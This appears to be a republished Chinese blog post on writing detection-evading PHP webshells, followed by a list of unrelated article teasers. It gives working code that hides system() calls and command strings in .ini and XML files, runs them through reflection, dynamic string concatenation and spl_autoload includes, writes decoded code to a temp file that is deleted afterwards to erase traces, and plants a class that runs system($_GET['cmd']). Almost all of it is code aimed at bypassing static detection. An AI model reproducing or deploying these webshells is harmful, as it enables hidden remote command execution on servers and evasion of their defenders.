基于 PHP 内置类及函数的免杀 WebShell

news2025/3/29 13:58:45

前言

PHP 作为广泛使用的服务端语言,其灵活的内置类(如 DOMDocument)和文件操作机制(.ini.inc 的自动加载),为攻击者提供了天然的隐蔽通道。通过 动态函数拼接反射调用加密混淆伪命名空间 等手法,恶意代码得以“寄生”于正常的业务逻辑中,甚至借助析构函数、自动加载等机制实现 无文件化触发。这种“隐写术”般的攻击方式,不仅挑战了传统检测技术的边界,也对开发者和安全团队提出了更高维度的防御要求。

本文将以 PHP 内置类与文件操作 为核心,深度剖析攻击者如何将 XML 解析、配置加载、自动包含等“合法”功能武器化,构建出零特征、高动态的免杀 WebShell。

利用parse_ini_file函数

PHP中有一个名为parse_ini_file的函数,用于解析.ini文件 , 如果Webshell的代码隐藏在.ini文件的某些配置项中,然后通过解析这些配置项来动态执行代码。

动态函数调用 + 反射执行

创建一个.ini文件,其中包含恶意代码的字符串

// [payload]
// func_name = "system"
// encoded_cmd = "d2hvYW1p"  // base64("whoami")

代码:

class ConfigLoader {
    private $config;

    public function __construct($file) {
        $this->config = parse_ini_file($file, true); // 解析 .ini 文件
        $this->execute();
    }

    private function execute() {
        $func = $this->config['payload']['func_name'];
        $cmd = base64_decode($this->config['payload']['encoded_cmd']);
        
        // 使用反射动态调用函数
        $reflection = new ReflectionFunction($func);
        $reflection->invoke($cmd);
    }
}

new ConfigLoader('config.ini'); // 触发执行
  • 敏感函数名(system)和指令(whoami)均存储在 .ini 文件中,避免代码硬编码。
  • 使用 反射(ReflectionFunction) 间接调用函数,绕过静态检测。
临时文件写入 + 包含执行

.ini文件

[payload]
encoded_code = "PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4="
<?
class TempFileExecutor {
    private $code;

    public function __construct($iniFile) {
        $config = parse_ini_file($iniFile);
        $this->code = base64_decode($config['encoded_code']);
        $this->run();
    }

    private function run() {
        $tempFile = tempnam(sys_get_temp_dir(), 'tmp_');
        file_put_contents($tempFile, $this->code);
        include $tempFile;    // 包含临时文件执行代码
        unlink($tempFile);    // 清理痕迹
    }
}

new TempFileExecutor('evil.ini');

利用spl_autoload 函数

函数定义
spl_autoload(string $class_name, string $file_extensions = null): void
  • 参数

  • $class_name:需要加载的类名。

  • $file_extensions(可选):指定文件扩展名(如 .php,.inc),默认使用 include_path 中的配置。

行为逻辑
  1. 将类名 $class_name 转换为小写(若系统区分大小写则保留原大小写)。
  2. $file_extensions 指定的扩展名,在 include_path 目录下查找文件。
  3. 找到文件后自动包含(include_once)该文件。

1.inc文件

<?php system("whoami"); ?>

1.php

<?php spl_autoload("1"); ?>
  1. spl_autoload("1") 尝试加载类名为 nb 的文件。
  2. 按默认规则查找 nb.php1.inc,发现 1.inc 存在。
  3. 包含 1.inc 并执行 webshell,输出服务器配置信息。

关键点

  • spl_autoload 不仅用于加载类,直接调用时也可触发文件包含
  • 文件扩展名(.inc)和类名(1)需匹配,但文件内容无需严格包含类定义。
伪装类文件 + 动态执行

payload.inc

<?php
class Payload { // 伪装成合法类
    public static function run() {
        system($_GET['cmd']); // 恶意代码
    }
}

1.php

<?php
spl_autoload("payload"); // 加载 Payload 类
if (class_exists('Payload')) {
    Payload::run(); // 触发恶意代码
}

利用DOMDocument类

DOMDocument 是 PHP 中用于处理 XMLHTML 文档的核心类。它基于 W3C 的 DOM(Document Object Model)标准,提供了一套完整的 API,允许开发者以树形结构操作文档节点(如元素、属性、文本等)。,支持XPath查询和动态节点解析 (php版本>8.0)

常用方法

方法名功能说明示例
createElement($name, $value)创建元素节点$element = $dom->createElement('tag', 'content')
createAttribute($name)创建属性节点$attr = $dom->createAttribute('id')
getElementsByTagName($name)通过标签名获取节点列表$items = $dom->getElementsByTagName('item')
getElementById($id)通过 ID 获取单个元素(需 DTD 验证)$node = $dom->getElementById('main')
saveHTML()输出 HTML 格式字符串(处理 HTML 文档时)$html = $dom->saveHTML()
validate()验证文档是否符合 DTD/XSDif ($dom->validate()) { ... }

解析 XML 数据

<?php
$xml = <<<XML
<?xml version="1.0"?>
<books>
    <book id="1">
        <title>PHP Basics</title>
        <author>John Doe</author>
    </book>
</books>
XML;

$dom = new DOMDocument();
$dom->loadXML($xml);

// 遍历所有 <book> 节点
foreach ($dom->getElementsByTagName('book') as $book) {
    $title = $book->getElementsByTagName('title')->item(0)->nodeValue;
    $author = $book->getElementsByTagName('author')->item(0)->nodeValue;
    echo "Title: $title, Author: $author\n";
}

输出:

这里我们可以提取xml里面各节点的内容,这样的话,我们就可以把恶意字符串隐藏在xml文件里面

<?php
// 恶意 XML 数据(可远程加载或硬编码)
$xml = <<<XML
<root>
    <data>whoami</data>
</root>
XML;

$doc = new DOMDocument();
$doc->loadXML($xml);  // 解析 XML
$xpath = new DOMXPath($doc);
$node = $xpath->query('//data')->item(0); // 提取节点值

// 动态调用高危函数(避免直接写 system)
$func = 'sys' . 'tem';
$func($node->nodeValue);  // 执行系统命令
?>

将恶意字符串完全隐藏在 XML 文件中

1.xml

<?xml version="1.0" encoding="UTF-8"?>
<config>
    <!-- 函数名分块存储 -->
    <function>
        <part>sys</part>
        <part>tem</part>
    </function>
    <!-- 参数使用 Base64 编码 -->
    <data>d2hvYW1p</data> <!-- Base64("whoami") -->
</config>

1.php

<?php
// 加载外部 XML 文件(可替换为远程 URL)
$xml = file_get_contents('malicious.xml');

// 解析 XML
$doc = new DOMDocument();
$doc->loadXML($xml);
$xpath = new DOMXPath($doc);

// 提取分块函数名并拼接
$funcParts = $xpath->query('//function/part');
$func = '';
foreach ($funcParts as $part) {
    $func .= $part->nodeValue; // 拼接为 "system"
}

// 提取并解码参数
$dataNode = $xpath->query('//data')->item(0);
$arg = base64_decode($dataNode->nodeValue); // 解码为 "whoami"

// 动态调用(增加安全验证)
if ($func && $arg && function_exists($func)) {
    ($func)($arg); // 执行 system("whoami")
} else {
    error_log("配置错误或函数不可用"); // 伪装成普通错误日志
}
?>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2322005.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

鸿蒙移动应用开发--UI组件布局

实验要求&#xff1a; 制作一个B站视频卡片界面&#xff0c;大致如下图所示&#xff0c;要求应用到线性布局、层叠布局等相关课堂知识。背景图、logo及文本内容不限。 实验环境 &#xff1a;DevEco Studio 实验过程&#xff1a; 步骤1&#xff1a;创建项目 1. 在您的开发环境…

C++(16)—类和对象(下) ①再探构造函数

文章目录 一、构造函数初始化方式回顾二、初始化列表详解1. 初始化列表语法与特点2. 必须使用初始化列表的成员变量 三、初始化列表的底层机制四、最佳实践五、总结 一、构造函数初始化方式回顾 在C中&#xff0c;构造函数用于初始化对象的成员变量。传统的初始化方式是在构造…

投sci论文自己查重方法

首先进入查重网站科研者之家-Home of Reasearchers 会看到里面有很多小工具&#xff08;比较高级的是要付费的&#xff09; 我们找到论文查重的小工具&#xff1a;论文查重——>英文论文自助查重系统 把论文上传

宝塔docker flarum默认登录账号密码,crazymax/flarum镜像默认登录账号密码

docker flarum默认账号密码 刚创建完毕时的登录账号和密码都是flarum 来源说明 宝塔安装的这个1.8.5版本的docker flarum的版本是&#xff0c;用的是 Docker库 https://hub.docker.com/r/crazymax/flarum Github库 https://github.com/crazy-max/docker-flarum

电脑干货:万能驱动--EasyDrv8

目录 万能驱动EasyDrv8 功能介绍 主程序界面 驱动解压与安装 PE环境支持 系统部署环境 桌面环境一键解决方案 万能驱动8电脑版是由IT天空出品的一款智能识别电脑硬件并自动安装驱动的工具&#xff0c;一般又称为it天空万能驱动&#xff0c;万能驱动vip版&#xff0c;简称…

C++中将记录集的数据复制到Excel工作表中的CRange类CopyFromRecordset函数异常怎么捕获

文章目录 一、异常类型及捕获逻辑二、完整代码示例三、关键错误场景与解决方案1. CopyFromRecordset 返回空数据2. COM错误 0x800A03EC3. Excel进程残留4. 内存不足 四、调试与日志记录1. 启用详细日志2. 捕获错误描述3. 调试断点 五、最佳实践 在C中使用 CRange::CopyFromReco…

使用vector构造杨辉三角形

力扣118题&#xff1a; 给定一个非负整数 numRows&#xff0c;生成「杨辉三角」的前 numRows 行。 在「杨辉三角」中&#xff0c;每个数是它左上方和右上方的数的和。 示例 1: 输入: numRows 5 输出: [[1],[1,1],[1,2,1],[1,3,3,1],[1,4,6,4,1]]示例 2: 输入: numRows 1…

conda环境下解决gitk乱码模糊

关键词 conda、git、gitk、git gui、模糊、linux、乱码 现象 操作系统&#xff1a;ubuntu24.04 conda版本&#xff1a;25.1.1 正常的终端里gitk显示不会模糊 但是在conda创建的python虚拟环境中使用gitk&#xff0c;字体开始变得模糊不清 分析 根据deepseek的原因原因分析…

Contactile三轴触觉传感器:多维力感赋能机器人抓取

在非结构化环境中&#xff0c;机器人对物体的精准抓取与操作始终面临巨大挑战。传统传感器因无法全面感知触觉参数&#xff08;如三维力、位移、摩擦&#xff09;&#xff0c;难以适应复杂多变的场景。Contactile推出的三轴触觉力传感器&#xff0c;通过仿生设计与创新光学技术…

远程登录服务(ssh)

一、远程登录服务概述 1. 概念 远程登录服务就像是一个神奇的桥梁&#xff0c;它让你能够跨越物理距离&#xff0c;通过网络连接到另一台计算机上进行操作。无论你身在何处&#xff0c;只要有网络连接&#xff0c;你就可以像坐在目标计算机前一样进行各种操作。 2. 功能 分享…

如何在阿里云linux主机上部署Node.Js

在阿里云的Linux服务器上搭建Node.js编程环境可以通过以下步骤完成。这里以常见的 Ubuntu/CentOS 系统为例&#xff0c;提供两种安装方式&#xff08;包管理器、NVM多版本管理&#xff09;&#xff1a; 一、通过包管理器安装&#xff08;适合快速安装指定版本&#xff09; 1. …

VS Code连接远程服务遇到的问题

目录 一、VS Code链接远程服务 二、修改的文件不能保存 三、无法与 "Ip地址" 建立连接: 远程主机密钥已更改&#xff0c;端口转发已禁用. 四、解决远程连接后&#xff0c;每次断开让输入密码问题&#xff0c;实现免密登录 没有秘钥对&#xff0c;免密配置流程&a…

大模型训练 | 智能体知识库 资源收集之心理咨询问答数据集

最近我一直在研究AI大模型相关的内容&#xff0c;想着从现在开始慢慢收集各种各样的资源&#xff0c;万一以后需要训练大模型的时候可以用到&#xff0c;或者自己以后也许会需要。今天我想介绍一组“心理咨询问答数据集”产品&#xff0c;包含9414条心理咨询问答数据&#xff0…

AI Agent开发大全第十一课-超维空间里的语义翻译官:Embedding技术

一、Embedding:数字世界的"翻译官"与"导航仪" 1.1 从字符到向量的魔法 当我们输入"巧克力"三个字时,传统计算机只能识别ASCII码组成的符号序列,而Embedding技术就像给每个词语配备了"超维定位坐标"。通过深度学习模型,它将离散的…

2024年第九届全国固态电池研讨会(脱敏)PPT合集(41份).zip

2024年第九届全国固态电池研讨会&#xff08;脱敏&#xff09;PPT合集&#xff0c;共41份。供大家参考学习。 1、锂金属全固态电池关键材料与器件.pdf 2、聚醚基聚合物锂金属电池.pdf 3、氧化物固态电解质与高能量密度安全固态锂电池.pdf 4、复合固态电解质界面设计工艺探索与…

OpenCV三维解算常用方法C++

如果标定过程是通过OpenCV张正友标定法实现的&#xff0c;得到的内参外参保存在.txt文件中是这样的形式&#xff1a; ① 内参intrinsics.txt&#xff1a; ② 外参extrinsics.txt&#xff1a; 那么可以通过如下方法读取.txt文件获取左右相机内外参&#xff0c;主要包括三维解算…

【蓝桥杯每日一题】3.25

&#x1f3dd;️专栏&#xff1a; 【蓝桥杯备篇】 &#x1f305;主页&#xff1a; f狐o狸x “OJ超时不是终点&#xff0c;是算法在提醒你该优化时间复杂度了&#xff01;” 目录 3.25 差分数组 一、一维差分 题目链接&#xff1a; 题目描述&#xff1a; 解题思路&#xff1a;…

前端NVM安装

https://v0.dev/chat/settings 本地启动环境 1安装 nvm 2安装node nvm install v18.19.0 nvm install v20.9.0 nvm use 18 node -v 3安装 pnpm npm install -g pnpm 或者 npm i -g pnpm 4启动 代码 目录下 执行 pnpm i pnpm run dev 4.1到代码目录下 4.2直接cmd…

Springboot应用配置github自动流部署 深入理解CI/CD:构建、测试和部署的自动化完整流程

什么是 CI 持续集成 通过自动化的流程和工具&#xff0c;提高软件开发的效率、质量和交付速度。 持续集成是开发团队通过将代码的不同部分集成到共享存储库中&#xff0c;并频繁地进行构建和测试&#xff0c;以确保代码的一致性和稳定性。 概念 在现在的开发模式中&#x…

解锁DeepSeek潜能:Docker+Ollama打造本地大模型部署新范式

&#x1f407;明明跟你说过&#xff1a;个人主页 &#x1f3c5;个人专栏&#xff1a;《深度探秘&#xff1a;AI界的007》 &#x1f3c5; &#x1f516;行路有良友&#xff0c;便是天堂&#x1f516; 目录 一、引言 1、什么是Docker 2、什么是Ollama 二、准备工作 1、操…